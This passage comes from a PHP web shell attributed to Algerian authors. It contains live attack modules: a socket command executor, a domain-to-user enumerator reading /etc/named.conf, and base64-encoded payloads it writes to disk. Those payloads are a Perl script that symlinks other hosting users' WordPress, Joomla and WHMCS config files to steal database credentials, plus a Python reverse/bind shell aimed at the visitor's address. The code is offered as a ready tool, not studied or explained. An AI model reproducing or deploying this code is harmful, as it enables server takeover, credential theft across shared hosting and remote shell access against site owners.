  5725. if(trim(strtolower($cmd))=="exit"){socket_write($sock,"Bye Bye\n");exit;}
  5726.  
  5727. else{
  5728.  
  5729. $process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env);
  5730.  
  5731. if (is_resource($process)) {
  5732.  
  5733. fwrite($pipes[0], $cmd);
  5734.  
  5735. fclose($pipes[0]);
  5736.  
  5737. $msg=stream_get_contents($pipes[1]);
  5738.  
  5739. socket_write($sock,$msg,strlen($msg));
  5740.  
  5741. fclose($pipes[1]);
  5742.  
  5743. $return_value = proc_close($process);}
  5744.  
  5745. }
  5746.  
  5747. }
  5748.  
  5749. }
  5750.  
  5751. }
  5752.  
  5753. break;
  5754.  
  5755. case "PHP_14":
  5756.  
  5757.  
  5758.  
  5759. echo "<title># Domains & Users</title>
  5760.  
  5761. <style>
  5762.  
  5763. body,table{background: black; font-family:Verdana,tahoma; color: white; font-size:10px; }
  5764.  
  5765. A:link {text-decoration: none;color: red;}
  5766.  
  5767. A:active {text-decoration: none;color: red;}
  5768.  
  5769. A:visited {text-decoration: none;color: red;}
  5770.  
  5771. A:hover {text-decoration: underline; color: red;}
  5772.  
  5773. #new,input,table,td,tr,#gg{text-align:center;border-style:solid;text-decoration:bold;}
  5774.  
  5775. tr:hover,td:hover{text-align:center;background-color: #FFFFCC; color:green;}
  5776.  
  5777. </style>
  5778.  
  5779. <p align=center># Domains & Users</p>
  5780.  
  5781. <p align=center>Karar alShaMi t00l with PHP .. Maked By Lagripe-Dz ..?!</p><center>";
  5782.  
  5783.  
  5784.  
  5785. $d0mains = @file("/etc/named.conf");
  5786.  
  5787.  
  5788.  
  5789. if(!$d0mains){ die("<b># can't ReaD -> [ /etc/named.conf ]"); }
  5790.  
  5791.  
  5792.  
  5793. echo "<table align=center border=1>
  5794.  
  5795. <tr bgcolor=green><td>d0mains</td><td>users</td></tr>";
  5796.  
  5797.  
  5798.  
  5799. foreach($d0mains as $d0main){
  5800.  
  5801.  
  5802.  
  5803. if(eregi("zone",$d0main)){
  5804.  
  5805.  
  5806.  
  5807. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  5808.  
  5809. flush();
  5810.  
  5811.  
  5812.  
  5813. if(strlen(trim($domains[1][0])) > 2){
  5814.  
  5815.  
  5816.  
  5817. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  5818.  
  5819.  
  5820.  
  5821. echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>"; flush();
  5822.  
  5823.  
  5824.  
  5825. }}}
  5826.  
  5827.  
  5828.  
  5829. echo "</table>
  5830.  
  5831. <p align='center'>
  5832.  
  5833. MaDe in AlGeriA 2o11 (r)
  5834.  
  5835. </p>
  5836.  
  5837. ";
  5838.  
  5839. break;
  5840.  
  5841. case "PHP_15":
  5842.  
  5843. mkdir('ShowsourceRead', 0755);
  5844.  
  5845. chdir('ShowsourceRead');
  5846.  
  5847.  
  5848.  
  5849. $filexc = 'ZWNobyAiPGh0bWw+CjwvdGQ+PC90cj48L3RhYmxlPjxmb3JtIG1ldGhvZD0nUE9TVCcgZW5jdHlw
  5850.  
  5851. ZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YScgPgo8L3RkPjwvdHI+PC90YWJsZT48Zm9ybSBtZXRob2Q9
  5852.  
  5853. J1BPU1QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnID4KPGJyPgo8Yj5zaG93X3NvdXJj
  5854.  
  5855. ZSAgOiA8L2I+PGlucHV0IHR5cGU9J3RleHQnIG5hbWU9J3Nob3cnIHZhbHVlPScnIHNpemU9JzU5
  5856.  
  5857. JyBzdHlsZT0nY29sb3I6ICNmZmZmZmY7IGJvcmRlcjogMXB4IGRvdHRlZCByZWQ7IGJhY2tncm91
  5858.  
  5859. bmQtY29sb3I6ICMwMDAwMDAnPjwvcD4KPGI+aGlnaGxpZ2h0X2ZpbGUgOiA8L2I+PGlucHV0IHR5
  5860.  
  5861. cGU9J3RleHQnIG5hbWU9J2hpZ2gnIHZhbHVlPScnIHNpemU9JzU5JyBzdHlsZT0nY29sb3I6ICNm
  5862.  
  5863. ZmZmZmY7IGJvcmRlcjogMXB4IGRvdHRlZCAjZmZmZmZmOyBiYWNrZ3JvdW5kLWNvbG9yOiAjMDAw
  5864.  
  5865. MDAwJz48L3A+CjxpbnB1dCB0eXBlPSdzdWJtaXQnJyAgdmFsdWU9J1JlYWQnICBzdHlsZT0nY29s
  5866.  
  5867. b3I6IHJlZDsgYm9yZGVyOiAxcHggZG90dGVkIG9yYW5nZTsgYmFja2dyb3VuZC1jb2xvcjogZ3Jl
  5868.  
  5869. ZW4nPjwvZm9ybTwvcD4KPC9mb3JtPC9wPiI7Cjw/cGhwCmlmKGVtcHR5KCRfUE9TVFsnc2hvdydd
  5870.  
  5871. KSkKewp9CmVsc2UKewokcyA9ICRfUE9TVFsnc2hvdyddOwplY2hvICI8Yj48aDE+PGZvbnQgc2l6
  5872.  
  5873. ZT0nNCcgY29sb3I9J3JlZCc+c2hvd19zb3VyY2U8L2ZvbnQ+PC9oMT4iOwokc2hvdyA9IHNob3df
  5874.  
  5875. c291cmNlKCRzKTsKfQppZihlbXB0eSgkX1BPU1RbJ2hpZ2gnXSkpCnsKfQplbHNlCnsKJGggPSAk
  5876.  
  5877. X1BPU1RbJ2hpZ2gnXTsKZWNobyAiPGI+PGgxPjxmb250IHNpemU9JzQnIGNvbG9yPSdncmVlbic+
  5878.  
  5879. aGlnaGxpZ2h0X2ZpbGU8L2ZvbnQ+PC9oMT4iOwplY2hvICI8YnI+IjsKJGhpZ2ggPSBoaWdobGln
  5880.  
  5881. aHRfZmlsZSgkaCk7Cn0KPz4=';
  5882.  
  5883.  
  5884.  
  5885. $file = fopen("read.php" ,"w+");
  5886.  
  5887. $write = fwrite ($file ,base64_decode($filexc));
  5888.  
  5889. fclose($file);
  5890.  
  5891. echo "<iframe src=ShowsourceRead/read.php width=100% height=100% frameborder=0></iframe> ";
  5892.  
  5893. break;
  5894.  
  5895. case "PHP_16":
  5896.  
  5897. mkdir('configler', 0755);
  5898.  
  5899. chdir('configler');
  5900.  
  5901. $kokdosya = ".htaccess";
  5902.  
  5903. $dosya_adi = "$kokdosya";
  5904.  
  5905. $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a&#231;&#305;lamad&#305;!");
  5906.  
  5907. $metin = "AddHandler cgi-script .izo";
  5908.  
  5909. fwrite ( $dosya , $metin ) ;
  5910.  
  5911. fclose ($dosya);
  5912.  
  5913. $configshell = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpwcmludCAiQ29udGVudC10eXBl
  5914.  
  5915. OiB0ZXh0L2h0bWxcblxuIjsNCnByaW50JzwhRE9DVFlQRSBodG1sIFBVQkxJQyAiLS8vVzNDLy9E
  5916.  
  5917. VEQgWEhUTUwgMS4wIFRyYW5zaXRpb25hbC8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRt
  5918.  
  5919. bDEvRFREL3hodG1sMS10cmFuc2l0aW9uYWwuZHRkIj4NCjxodG1sIHhtbG5zPSJodHRwOi8vd3d3
  5920.  
  5921. LnczLm9yZy8xOTk5L3hodG1sIj4NCjxoZWFkPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1M
  5922.  
  5923. YW5ndWFnZSIgY29udGVudD0iZW4tdXMiIC8+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5
  5924.  
  5925. cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCIgLz4NCjx0aXRsZT5bfl0gQ3li
  5926.  
  5927. M3ItRFogQ29uZmlnIC0gW35dIDwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KLm5l
  5928.  
  5929. d1N0eWxlMSB7DQogZm9udC1mYW1pbHk6IFRhaG9tYTsNCiBmb250LXNpemU6IHgtc21hbGw7DQog
  5930.  
  5931. Zm9udC13ZWlnaHQ6IGJvbGQ7DQogY29sb3I6ICMwMEZGRkY7DQogIHRleHQtYWxpZ246IGNlbnRl
  5932.  
  5933. cjsNCn0NCjwvc3R5bGU+DQo8L2hlYWQ+DQonOw0Kc3ViIGxpbHsNCiAgICAoJHVzZXIpID0gQF87
  5934.  
  5935. DQokbXNyID0gcXh7cHdkfTsNCiRrb2xhPSRtc3IuIi8iLiR1c2VyOw0KJGtvbGE9fnMvXG4vL2c7
  5936.  
  5937. IA0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2x1ZGVzL2NvbmZpZ3Vy
  5938.  
  5939. ZS5waHAnLCRrb2xhLictc2hvcC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJs
  5940.  
  5941. aWNfaHRtbC9hbWVtYmVyL2NvbmZpZy5pbmMucGhwJywka29sYS4nLWFtZW1iZXIudHh0Jyk7DQpz
  5942.  
  5943. eW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY29uZmlnLmluYy5waHAnLCRrb2xh
  5944.  
  5945. LictYW1lbWJlcjIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv
  5946.  
  5947. bWVtYmVycy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1tZW1iZXJzLnR4dCcpOw0Kc3ltbGlu
  5948.  
  5949. aygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZy5waHAnLCRrb2xhLicyLnR4dCcp
  5950.  
  5951. Ow0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL2luY2x1ZGVzL2Nv
  5952.  
  5953. bmZpZy5waHAnLCRrb2xhLictZm9ydW0udHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv
  5954.  
  5955. cHVibGljX2h0bWwvYWRtaW4vY29uZi5waHAnLCRrb2xhLic1LnR4dCcpOw0Kc3ltbGluaygnL2hv
  5956.  
  5957. bWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2FkbWluL2NvbmZpZy5waHAnLCRrb2xhLic0LnR4dCcp
  5958.  
  5959. Ow0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRr
  5960.  
  5961. b2xhLictd3AxMy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9i
  5962.  
  5963. bG9nL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AtYmxvZy50eHQnKTsNCnN5bWxpbmsoJy9ob21l
  5964.  
  5965. LycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25mX2dsb2JhbC5waHAnLCRrb2xhLic2LnR4dCcpOw0K
  5966.  
  5967. c3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2x1ZGUvZGIucGhwJywka29s
  5968.  
  5969. YS4nNy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25uZWN0
  5970.  
  5971. LnBocCcsJGtvbGEuJzgudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0
  5972.  
  5973. bWwvbWtfY29uZi5waHAnLCRrb2xhLic5LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4n
  5974.  
  5975. L3B1YmxpY19odG1sL2luY2x1ZGUvY29uZmlnLnBocCcsJGtvbGEuJzEyLnR4dCcpOw0Kc3ltbGlu
  5976.  
  5977. aygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2pvb21sYS9jb25maWd1cmF0aW9uLnBocCcs
  5978.  
  5979. JGtvbGEuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0
  5980.  
  5981. bWwvdmIvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJy12Yi50eHQnKTsNCnN5bWxpbmsoJy9o
  5982.  
  5983. b21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLWlu
  5984.  
  5985. Y2x1ZGVzLXZiLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3do
  5986.  
  5987. bS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy13aG0xNS50eHQnKTsNCnN5bWxpbmsoJy9ob21l
  5988.  
  5989. LycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXdo
  5990.  
  5991. bWMxNi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jcy9j
  5992.  
  5993. b25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycu
  5994.  
  5995. JHVzZXIuJy9wdWJsaWNfaHRtbC9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXN1
  5996.  
  5997. cHBvcnQudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY29uZmln
  5998.  
  5999. dXJhdGlvbi5waHAnLCRrb2xhLicxd2htY3MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2Vy
  6000.  
  6001. LicvcHVibGljX2h0bWwvc3VibWl0dGlja2V0LnBocCcsJGtvbGEuJy13aG1jczIudHh0Jyk7DQpz
  6002.  
  6003. eW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9u
  6004.  
  6005. LnBocCcsJGtvbGEuJy1jbGllbnRzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1
  6006.  
  6007. YmxpY19odG1sL2NsaWVudC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1jbGllbnQudHh0Jyk7
  6008.  
  6009. DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50ZXMvY29uZmlndXJh
  6010.  
  6011. dGlvbi5waHAnLCRrb2xhLictY2xpZW50cy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIu
  6012.  
  6013. Jy9wdWJsaWNfaHRtbC9iaWxsaW5nL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWJpbGxpbmcu
  6014.  
  6015. dHh0Jyk7IA0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL21hbmFnZS9jb25m
  6016.  
  6017. aWd1cmF0aW9uLnBocCcsJGtvbGEuJy1iaWxsaW5nLnR4dCcpOyANCnN5bWxpbmsoJy9ob21lLycu
  6018.  
  6019. JHVzZXIuJy9wdWJsaWNfaHRtbC9teS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1iaWxsaW5n
  6020.  
  6021. LnR4dCcpOyANCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9teXNob3AvY29u
  6022.  
  6023. ZmlndXJhdGlvbi5waHAnLCRrb2xhLictYmlsbGluZy50eHQnKTsgDQp9DQppZiAoJEVOVnsnUkVR
  6024.  
  6025. VUVTVF9NRVRIT0QnfSBlcSAnUE9TVCcpIHsNCiAgcmVhZChTVERJTiwgJGJ1ZmZlciwgJEVOVnsn
  6026.  
  6027. Q09OVEVOVF9MRU5HVEgnfSk7DQp9IGVsc2Ugew0KICAkYnVmZmVyID0gJEVOVnsnUVVFUllfU1RS
  6028.  
  6029. SU5HJ307DQp9DQpAcGFpcnMgPSBzcGxpdCgvJi8sICRidWZmZXIpOw0KZm9yZWFjaCAkcGFpciAo
  6030.  
  6031. QHBhaXJzKSB7DQogICgkbmFtZSwgJHZhbHVlKSA9IHNwbGl0KC89LywgJHBhaXIpOw0KICAkbmFt
  6032.  
  6033. ZSA9fiB0ci8rLyAvOw0KICAkbmFtZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFj
  6034.  
  6035. aygiQyIsIGhleCgkMSkpL2VnOw0KICAkdmFsdWUgPX4gdHIvKy8gLzsNCiAgJHZhbHVlID1+IHMv
  6036.  
  6037. JShbYS1mQS1GMC05XVthLWZBLUYwLTldKS9wYWNrKCJDIiwgaGV4KCQxKSkvZWc7DQogICRGT1JN
  6038.  
  6039. eyRuYW1lfSA9ICR2YWx1ZTsNCn0NCmlmICgkRk9STXtwYXNzfSBlcSAiIil7DQpwcmludCAnDQo8
  6040.  
  6041. Ym9keSBjbGFzcz0ibmV3U3R5bGUxIiBiZ2NvbG9yPSIjMDAwMDAwIj4NCjxwPkN5YjNyLWR6IENv
  6042.  
  6043. bmZpZyBGdWNrIFNjcmlwdDwvcD4NCjxwPjxmb250IGNvbG9yPSIjQzBDMEMwIj5bPC9mb250PiBD
  6044.  
  6045. b2RlZCBCeSBDeWIzci1EWiA8Zm9udCBjb2xvcj0iI0MwQzBDMCI+fDwvZm9udD4gDQreYSBATy4g
  6046.  
  6047. ZskcZS8g3mE8c3BhbiBpZD0icmVzdWx0X2JveCIgY2xhc3M9InNob3J0X3RleHQiIGxhbmc9ImVu
  6048.  
  6049. Ij48c3BhbiBzdHlsZSB0aXRsZT4NCjxmb250IGNvbG9yPSIjQzBDMEMwIj58PC9mb250Pjwvc3Bh
  6050.  
  6051. bj48L3NwYW4+IDxhIGhyZWY9Imh0dHA6Ly93d3cud3d3LnNlYzRldmVyLmNvbSI+DQo8c3BhbiBz
  6052.  
  6053. dHlsZT0idGV4dC1kZWNvcmF0aW9uOiBub25lIj48Zm9udCBjb2xvcj0iIzAwRkYwMCI+d3d3LnNl
  6054.  
  6055. YzRldmVyLmNvbTwvZm9udD48L3NwYW4+PC9hPiANCjxmb250IGNvbG9yPSIjQzBDMEMwIj5dPC9m
  6056.  
  6057. b250PjwvcD4NCjxmb3JtIG1ldGhvZD0icG9zdCI+DQo8dGV4dGFyZWEgbmFtZT0icGFzcyIgc3R5
  6058.  
  6059. bGU9ImJvcmRlcjoxcHggZG90dGVkICMwMEZGRkY7IHdpZHRoOiA1NDNweDsgaGVpZ2h0OiA0MjBw
  6060.  
  6061. eDsgYmFja2dyb3VuZC1jb2xvcjojMEMwQzBDOyBmb250LWZhbWlseTpUYWhvbWE7IGZvbnQtc2l6
  6062.  
  6063. ZTo4cHQ7IGNvbG9yOiMwMEZGRkYiICA+PC90ZXh0YXJlYT48YnIgLz4NCiZuYnNwOzxwPg0KPGlu
  6064.  
  6065. cHV0IG5hbWU9InRhciIgdHlwZT0idGV4dCIgc3R5bGU9ImJvcmRlcjoxcHggZG90dGVkICMwMEZG
  6066.  
  6067. RkY7IHdpZHRoOiAyMTJweDsgYmFja2dyb3VuZC1jb2xvcjojMEMwQzBDOyBmb250LWZhbWlseTpU
  6068.  
  6069. YWhvbWE7IGZvbnQtc2l6ZTo4cHQ7IGNvbG9yOiMwMEZGRkY7ICIgIC8+PGJyIC8+DQombmJzcDs8
  6070.  
  6071. L3A+DQo8cD4NCjxpbnB1dCBuYW1lPSJTdWJtaXQxIiB0eXBlPSJzdWJtaXQiIHZhbHVlPSJHZXQg
  6072.  
  6073. Q29uZmlnIiBzdHlsZT0iYm9yZGVyOjFweCBkb3R0ZWQgIzAwRkZGRjsgd2lkdGg6IDk5OyBmb250
  6074.  
  6075. LWZhbWlseTpUYWhvbWE7IGZvbnQtc2l6ZToxMHB0OyBjb2xvcjojMDBGRkZGOyB0ZXh0LXRyYW5z
  6076.  
  6077. Zm9ybTp1cHBlcmNhc2U7IGhlaWdodDoyMzsgYmFja2dyb3VuZC1jb2xvcjojMEMwQzBDIiAvPjwv
  6078.  
  6079. cD4NCjwvZm9ybT4nOw0KfWVsc2V7DQpAbGluZXMgPTwkRk9STXtwYXNzfT47DQokeSA9IEBsaW5l
  6080.  
  6081. czsNCm9wZW4gKE1ZRklMRSwgIj50YXIudG1wIik7DQpwcmludCBNWUZJTEUgInRhciAtY3pmICIu
  6082.  
  6083. JEZPUk17dGFyfS4iLnRhciAiOw0KZm9yICgka2E9MDska2E8JHk7JGthKyspew0Kd2hpbGUoQGxp
  6084.  
  6085. bmVzWyRrYV0gID1+IG0vKC4qPyk6eDovZyl7DQombGlsKCQxKTsNCnByaW50IE1ZRklMRSAkMS4i
  6086.  
  6087. LnR4dCAiOw0KZm9yKCRrZD0xOyRrZDwxODska2QrKyl7DQpwcmludCBNWUZJTEUgJDEuJGtkLiIu
  6088.  
  6089. dHh0ICI7DQp9DQp9DQogfQ0KcHJpbnQnPGJvZHkgY2xhc3M9Im5ld1N0eWxlMSIgYmdjb2xvcj0i
  6090.  
  6091. IzAwMDAwMCI+DQo8cD5Eb25lICEhPC9wPg0KPHA+Jm5ic3A7PC9wPic7DQppZigkRk9STXt0YXJ9
  6092.  
  6093. IG5lICIiKXsNCm9wZW4oSU5GTywgInRhci50bXAiKTsNCkBsaW5lcyA9PElORk8+IDsNCmNsb3Nl
  6094.  
  6095. KElORk8pOw0Kc3lzdGVtKEBsaW5lcyk7DQpwcmludCc8cD48YSBocmVmPSInLiRGT1JNe3Rhcn0u
  6096.  
  6097. Jy50YXIiPjxmb250IGNvbG9yPSIjMDBGRjAwIj4NCjxzcGFuIHN0eWxlPSJ0ZXh0LWRlY29yYXRp
  6098.  
  6099. b246IG5vbmUiPkNsaWNrIEhlcmUgVG8gRG93bmxvYWQgVGFyIEZpbGU8L3NwYW4+PC9mb250Pjwv
  6100.  
  6101. YT48L3A+JzsNCn0NCn0NCiBwcmludCINCjwvYm9keT4NCjwvaHRtbD4iOw==';
  6102.  
  6103.  
  6104.  
  6105. $file = fopen("config.izo" ,"w+");
  6106.  
  6107. $write = fwrite ($file ,base64_decode($configshell));
  6108.  
  6109. fclose($file);
  6110.  
  6111. chmod("config.izo",0755);
  6112.  
  6113. echo "<iframe src=configler/config.izo width=100% height=100% frameborder=0></iframe> ";
  6114.  
  6115. break;
  6116.  
  6117. case "PHP_17":
  6118.  
  6119.  
  6120.  
  6121. $bizci = 'IyEvdXNyL2Jpbi9lbnYgcHl0aG9uCgojICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMg
  6122.  
  6123. IyAjICMgIyAjICMgIyAjICMgIyAjICMKIyAgIGQwMHIucHkgMC4zYSAocmV2ZXJzZXxiaW5kKS1z
  6124.  
  6125. aGVsbCBpbiBweXRob24gYnkgZlEJIwojCQkJCQkJCSMKIwlhbHBoYQkJCQkJCSMKIwkJCQkJCQkj
  6126.  
  6127. CiMJCQkJCQkJIwojIHVzYWdlOiAJCQkJCQkjCiMgCSUgLi9kMDByIC1iIHBhc3N3b3JkIHBvcnQJ
  6128.  
  6129. CQkjCiMJJSAuL2QwMHIgLXIgcGFzc3dvcmQgcG9ydCBob3N0CQkJIwojCSUgbmMgaG9zdCBwb3J0
  6130.  
  6131. CQkJCQkjCiMJJSBuYyAtbCAtcCBwb3J0IChwbGVhc2UgdXNlIG5ldGNhdCkJCSMKIyAjICMgIyAj
  6132.  
  6133. ICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIyAjICMgIwkjCgoKaW1wb3J0
  6134.  
  6135. IG9zLCBzeXMsIHNvY2tldCwgdGltZQoKCiMgPT09PT09PT09PT09PT09PT09PSB2YXIgPT09PT09
  6136.  
  6137. PQpNQVhfTEVOPTEwMjQKU0hFTEw9Ii9iaW4venNoIC1jIgpUSU1FX09VVD0zMDAgI3MKUFc9IiIK
  6138.  
  6139. UE9SVD0iIgpIT1NUPSIiCgoKIyA9PT09PT09PT09PT09PT09PT09IGZ1bmN0ID09PT09CiMgc2hl
  6140.  
  6141. bGwgLSBleGVjIGNvbW1hbmQsIHJldHVybiBzdGRvdXQsIHN0ZGVycjsgaW1wcm92YWJsZQpkZWYg
  6142.  
  6143. c2hlbGwoY21kKToKCXNoX291dD1vcy5wb3BlbihTSEVMTCsiICIrY21kKS5yZWFkbGluZXMoKQoJ
  6144.  
  6145. bnNoX291dD0iIgoJZm9yIGkgaW4gcmFuZ2UobGVuKHNoX291dCkpOgkKCQluc2hfb3V0Kz1zaF9v
  6146.  
  6147. dXRbaV0KCXJldHVybiBuc2hfb3V0CQoKIyBhY3Rpb24/CmRlZiBhY3Rpb24oY29ubik6Cgljb25u
  6148.  
  6149. LnNlbmQoIlxuUGFzcz9cbiIpCgl0cnk6IHB3X2luPWNvbm4ucmVjdihsZW4oUFcpKQoJZXhjZXB0
  6150.  
  6151. OiBwcmludCAidGltZW91dCIKCWVsc2U6CQoJCWlmIHB3X2luID09IFBXOgkKCQkJY29ubi5zZW5k
  6152.  
  6153. KCJqMDAgYXJlIG9uIGFpciFcbiIpCQkJCQkJCgkJCXdoaWxlIFRydWU6ICAgICAgICAgICAgICAg
  6154.  
  6155. CQkKCQkJCWNvbm4uc2VuZCgiPj4+ICIpCgkJCQl0cnk6CgkJCQkJcGNtZD1jb25uLnJlY3YoTUFY
  6156.  
  6157. X0xFTikKCQkJCWV4Y2VwdDoKCQkJCQlwcmludCAidGltZW91dCIKCQkJCQlyZXR1cm4gVHJ1ZQkJ
  6158.  
  6159. CQkJCgkJCQllbHNlOgoJCQkJCSNwcmludCAicGNtZDoiLHBjbWQKCQkJCQljbWQ9IiIjcGNtZAoJ
  6160.  
  6161. CQkJCWZvciBpIGluIHJhbmdlKGxlbihwY21kKS0xKToKCQkJCQkJY21kKz1wY21kW2ldCgkJCSAg
  6162.  
  6163. ICAgICAgICAgICAgICBpZiBjbWQ9PSI6ZGMiOgoJCQkJCQlyZXR1cm4gVHJ1ZQoJCQkJCWVsaWYg
  6164.  
  6165. Y21kPT0iOnNkIjoKCQkJCQkJcmV0dXJuIEZhbHNlCgkJCQkJZWxzZToKCQkJCQkJaWYgbGVuKGNt
  6166.  
  6167. ZCk+MDoKCQkJCQkJCW91dD1zaGVsbChjbWQpCgkJCQkJCQljb25uLnNlbmQob3V0KQoKCiMgPT09
  6168.  
  6169. PT09PT09PT09PT09PT09PSBtYWluID09PT09PQphcmd2PXN5cy5hcmd2CgppZiBsZW4oYXJndik8
  6170.  
  6171. NDogCglwcmludCAiZXJyb3I7IGhlbHA6IGhlYWQgLW4gMTYgZDAwci5weSIKCXN5cy5leGl0KDEp
  6172.  
  6173. CmVsaWYgYXJndlsxXT09Ii1iIjogCglQVz1hcmd2WzJdCglQT1JUPWFyZ3ZbM10KZWxpZiBhcmd2
  6174.  
  6175. WzFdPT0iLXIiIGFuZCBsZW4oYXJndik+NDoKCVBXPWFyZ3ZbMl0KCVBPUlQ9YXJndlszXQoJSE9T
  6176.  
  6177. VD1hcmd2WzRdCmVsc2U6IGV4aXQoMSkKClBPUlQ9aW50KFBPUlQpCnByaW50ICJQVzoiLFBXLCJQ
  6178.  
  6179. T1JUOiIsUE9SVCwiSE9TVDoiLEhPU1QKCQojc3lzLmFyZ3ZbMF09ImQwMHIiCgojIGV4aXQgZmF0
  6180.  
  6181. aGVyIHByb2MKaWYgb3MuZm9yaygpIT0wOiAKCXN5cy5leGl0KDApCgojIGFzc29jaWF0ZSB0aGUg
  6182.  
  6183. c29ja2V0CnNvY2s9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCwgc29ja2V0LlNPQ0tfU1RS
  6184.  
  6185. RUFNKQpzb2NrLnNldHRpbWVvdXQoVElNRV9PVVQpCgppZiBhcmd2WzFdPT0iLWIiOgoJc29jay5i
  6186.  
  6187. aW5kKCgnbG9jYWxob3N0JywgUE9SVCkpCglzb2NrLmxpc3RlbigwKQoKcnVuPVRydWUKd2hpbGUg
  6188.  
  6189. cnVuOgoKCWlmIGFyZ3ZbMV09PSItciI6CgkJdHJ5OiBzb2NrLmNvbm5lY3QoIChIT1NULCBQT1JU
  6190.  
  6191. KSApCgkJZXhjZXB0OiAKCQkJcHJpbnQgImhvc3QgdW5yZWFjaGFibGUiCgkJCXRpbWUuc2xlZXAo
  6192.  
  6193. NSkKCQllbHNlOiBydW49YWN0aW9uKHNvY2spCgllbHNlOgkJCgkJdHJ5OgkoY29ubixhZGRyKT1z
  6194.  
  6195. b2NrLmFjY2VwdCgpCgkJZXhjZXB0OiAKCQkJcHJpbnQgInRpbWVvdXQiCgkJCXRpbWUuc2xlZXAo
  6196.  
  6197. MSkKCQllbHNlOiBydW49YWN0aW9uKGNvbm4pCQkJCgkKCSMgc2h1dGRvd24gdGhlIHNva2NldAoJ
  6198.  
  6199. aWYgYXJndlsxXT09Ii1iIjogY29ubi5zaHV0ZG93bigyKQoJZWxzZToKCQl0cnk6IHNvY2suc2Vu
  6200.  
  6201. ZCgiIikKCQlleGNlcHQ6IHRpbWUuc2xlZXAoMSkKCQllbHNlOiBzb2NrLnNodXRkb3duKDIp';
  6202.  
  6203.  
  6204.  
  6205. $file = fopen("priv9" ,"w+");
  6206.  
  6207. $write = fwrite ($file ,base64_decode($bizci));
  6208.  
  6209. fclose($file);
  6210.  
  6211. if ($write) {
  6212.  
  6213. echo "The File Was Created Successfuly";
  6214.  
  6215. }
  6216.  
  6217. else {echo"\"error\"";}
  6218.  
  6219. chmod("priv9" , 0777);
  6220.  
  6221. $fips=$_SERVER["REMOTE_ADDR"];
  6222.  
  6223. $bports="22";
